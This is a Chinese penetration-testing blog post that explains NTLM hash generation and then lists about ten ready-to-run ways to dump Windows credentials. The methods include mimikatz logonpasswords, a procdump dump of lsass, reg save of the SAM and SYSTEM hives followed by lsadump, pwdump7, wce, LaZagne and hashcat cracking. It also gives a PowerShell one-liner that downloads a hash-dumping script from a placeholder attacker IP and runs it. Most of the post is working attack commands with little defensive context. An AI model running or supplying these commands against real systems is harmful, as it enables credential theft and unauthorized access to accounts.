获取windows hash的几种方式

最新推荐文章于 2024-06-04 22:28:38 发布
最新推荐文章于 2024-06-04 22:28:38 发布
阅读量6.5k 收藏 19
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lansefly1990/article/details/104527209
版权

一、windows hash介绍

NTML  hash是指在windows系统下的Security Account Manager中保存的用户密码hash

该hash的生成方法:

将明文口令转换成十六进制的格式;

转换成Unicode格式,即在每个字节之后添加0x00;

对Unicode字符串作MD4加密,生成32位的十六进制数字串;

如测试测试密码为haha123

转成十六进制为:68616861313233

unicode转换:6800610068006100310032003300

md4加密:87ed0101e532322a4566d675f1627d30

测试环境:win7

二、windows hash值的获取

1、利用 mimikatz 获取明文密码

mimikatz下载地址:https://github.com/gentilkiwi/mimikatz/releases

根据下载文件夹中的readme

privilege::debug

sekurlsa::logonpasswords

获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段

2利用 procdump & mimikatz 获取密码(推荐使用)

procdump是 Microsoft Sysinternals tools 中的工具,它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中。

procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

以管理员身份运行cmd,利用procdump导出lsass进程文件

procdump.exe -accepteula -ma lsass.exe

导出结束后利用mimikatz读出内容

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit)

3、利用 pwdump7 获取密码

下载地址:http://passwords.openwall.net/b/pwdump/pwdump7.zip

管理员权限运行cmd

获取加密后的hash,可登录网站https://www.objectif-securite.ch/ophcrack,进行解密

也可以用hashcat进行破解,具体使用可参考;https://xz.aliyun.com/t/4008

hashcat -a 3 -m 1000  --force 209C6174DA490CAEB422F3FA5A7AE634 ?l?l?l?l?l

4、利用SAMinside获取hash

SAMInside:它能从SAM注册文件中提取用户名以及密码

“导入本地用户通过任务计划”

5、wce.exe 获取hash

下载地址:https://www.ampliasecurity.com/research/windows-credentials-editor/

保存输出到文件内:wce.exe  -o output.txt

获取明文密码:wce.exe -w

6、SharpDump.exe

7、Mimikatz 调用 lsadump(推荐使用)

该方法在win7、win10 下均可适用

 使用 Reg 需要NT/SYSTEM权限 :

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\security security.hiv

Mimikatz 调用 lsadump

lsadump::sam /system:system.hiv /sam:sam.hiv

8、QuarksPwDump工具

下载地址:https://github.com/ssssanr/QuarksPwDump-off-line

Quarkspwdump.exe -dhl

9、LaZagne

下载地址:https://github.com/AlessandroZ/LaZagne/releases/

LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序,存在linux版、windows版、mac版,LaZagne.exe可捕获的密码会全一些,可抓取浏览器、无线等相关密码,获取windows hash值。

LaZagne.exe  windows

10、powershell

一、Get-PassHashes.ps1

下载地址:https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1

使用方法:(xx.xx.xx.xx为存放shell的ip地址)

powershell IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/Get-PassHashes.ps1');Get-PassHashes

文档参考:

https://3gstudent.github.io/Windows%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81hash-NTLM-hash%E5%92%8CNet-NTLM-hash%E4%BB%8B%E7%BB%8D/

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87SAM%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8E%B7%E5%BE%97%E6%9C%AC%E5%9C%B0%E7%94%A8%E6%88%B7hash/

https://www.jianshu.com/p/7ccf6e15fbe0

yusec
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
获取目标主机HASH值的方法总结
gugonggugong的博客
03-18 702
PassingTheHash hash基础知识 hash获取 a. 获取system权限下直接用hashdump命令: b. 利用后渗透模块的脚本: c. 利用smart_hashdump模块获取hash: 绕过UAC提权 直接获取hash值 运行hash_dump模块获取hash: Hash破解和传递 破解 弱口令破解模块 传递 ...
获取哈希值
01-29
HashHash 获取哈希值获取哈希值获取哈希值获取哈希值获取哈希值
内网渗透-获取WIN本地用户Hash
小刚的博客
10-27 2385
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 WIN本地获取Hashwin系统密码为什么要获取本地hash几种工具和获取方式注册表 + mimikatzProcdump + mimikatz直接mimikatz读取密码 win系统密码 Windows系统使用LM和NTLM两种方法对用户的密码进行加密处理, 两种密码的加密方式在这有介绍Win本地hash概念 但注意的是从win-server-2008开始默认禁止使用LM加密方式,统一使用NT.
windows hash简介
最新发布
qq_52712762的博客
06-04 1009
1、Windows系统使用两种方法对用户的密码进行哈希处理。它们分别是LAN Manager(LM)哈希和NT LAN Manager(NTLM)哈希2、所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串3、现在已经有了更新的NTLMV2以及Kerberos验证体系4、Windows加密过的密码口令;我们称之为hashwindows的系统密码hash默认情况下一般由两部。
多种姿势抓取windows系统的hash
p_utao的博客
09-12 4897
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
获取hash
新知的博客
06-16 1301
获取hash值 code from hashlib import md5 from hashlib import sha1 from hashlib import sha224 from hashlib import sha384 from hashlib import sha512 import hashlib def hashForString(method,srcbyte): srcbyte = srcbyte.encode('gb2312') testnew = hashlib.n
获取hash方式
qq_44742261的博客
06-30 307
原生js:location.hash vue: this.$route.path this.$router 获取到所有router对象(vueRouter) this.$route 获取当前路由对象
JS获取几种URL地址的方法小结
12-12
4. `document.location`:这个对象包含了当前URL的各种部分,如`protocol`, `hostname`, `pathname`, `search`, `hash`等,可以分别访问这些属性来获取对应信息。 5. `top.location.href`:`top`引用顶级窗口,因此...
MD5校验工具Hash.exe
11-27
在实际应用中,Hash.exe这样的工具也经常与其他命令行工具结合使用,例如在Windows的命令提示符中,可以使用`CertUtil`命令来获取文件的MD5哈希值。在Linux或Unix系统中,可以使用`md5sum`或`openssl md5`命令。这些...
redis Windows版本
06-21
- **持久化**: Redis可以通过RDB(快照)和AOF(追加日志)两种方式进行数据持久化,确保即使在服务器重启后也能恢复数据。 - **事务**: Redis支持简单的事务,用户可以发送一组命令并确保它们作为一个原子操作执行...
获取ClickOnce部署的发布信息
04-05
ClickOnce是一种微软开发的技术,用于简化Windows桌面应用的部署、更新和卸载过程。它允许用户只需点击一次即可安装和运行应用程序,同时自动处理版本控制和更新检查。本篇文章将详细探讨如何获取ClickOnce部署的...
Windows系统管理员账号密码Hash哈希解密工具
11-06
在线解密Windows系统管理员账号密码Hash哈希值。 至于获取Hash百度有方法,本工具可以解密你得到的Hash
Pwdump7提取Windows系统密码hash
11-11
使用Pwdump7提取Windows系统密码hash值,Pwdump7可以在CMD下提取出系统中的用户的密码hash (包括LM和NTLM),当然必须要有系统权限.提取出了HASH,再用ophcrack破出明文密码,对进一步渗透是有很大帮助的。
windows下Redis解压版.zip
04-07
3. **Redis数据类型**:Redis支持五种基本数据类型,包括字符串(String)、哈希(Hash)、列表(List)、集合(Set)和有序集合(Sorted Set),每种类型都有其独特的应用场景。 4. **Redis命令**:Redis提供了...
使用GetHashes软件获取Windows系统Hash密码值
weixin_33757911的博客
12-01 450
使用GetHashes软件获取Windows系统Hash密码值 陈小兵 摘要 对***者来说,获取Windows的口令是整个***过程至关重要的一环,拥有系统原来用户的口令,将使得内网***和守控更加容易。Windows系统中的Hash密码值主要有LM-HASH以及NTLM-HASH值两部分构成,一旦***者获取了系统的Hash值,通过LC5以及彩虹表等破解工具可以很快的获取系统的密码。为此安...
windows获取hash常见手法
Python_0011的博客
01-11 1063
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
盘点windows获取hash常见手法~
logic1001的博客
01-24 1298
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获取到密码了。
密码与hash获取
qq_51796436的博客
09-07 1052
注销、重启、锁屏后,操作系统会让winlogon.exe显示登录界面,让用户输入密码。现在很多md5的使用是双重md5或者加盐(拼接md5),知道盐值是可以解的。hash算法在信息安全方面的应用:文件校验、数字签名、口令加密······,该进程保存一份明文密码并NTLM HASH后与SAM数据库比较认证。shadow copy (一般用在域控上几万几十万用户的时候)因为LM对半拆密码导致密码空间下降,安全性降低。
WINDOWS 窃取hash实现远程登录
The current road is different, love needs to distinguish between right and wrong
11-18 875
前言 提示:这可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Windows常用用户 SYSTEM: #本地机器上拥有最高权限的用户。 Administrator: #本地机器上拥有最高权限的用户。 Guest: # 只拥有相对较少的权限,默认被禁用。 二、Windows密码安全 1. Quarks P...
windows怎么获取hash
05-24
Windows 操作系统中,可以通过 PowerShell 命令来获取文件的哈希值。请按照以下步骤操作: 1. 打开 PowerShell 命令行界面,可以通过在开始菜单中搜索“PowerShell”来找到它。 2. 在 PowerShell 命令行中,使用以下命令来获取文件的哈希值: ``` Get-FileHash 文件路径 -Algorithm 哈希算法 ``` 其中,“文件路径”是要获取哈希值的文件的完整路径,“哈希算法”是要使用的哈希算法,可以使用的哈希算法包括 SHA1、SHA256、SHA384、SHA512、MD5 等。 例如,获取文件“C:\Windows\System32\notepad.exe”的 SHA256 哈希值,可以使用以下命令: ``` Get-FileHash C:\Windows\System32\notepad.exe -Algorithm SHA256 ``` 执行命令后,PowerShell 会显示文件的哈希值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值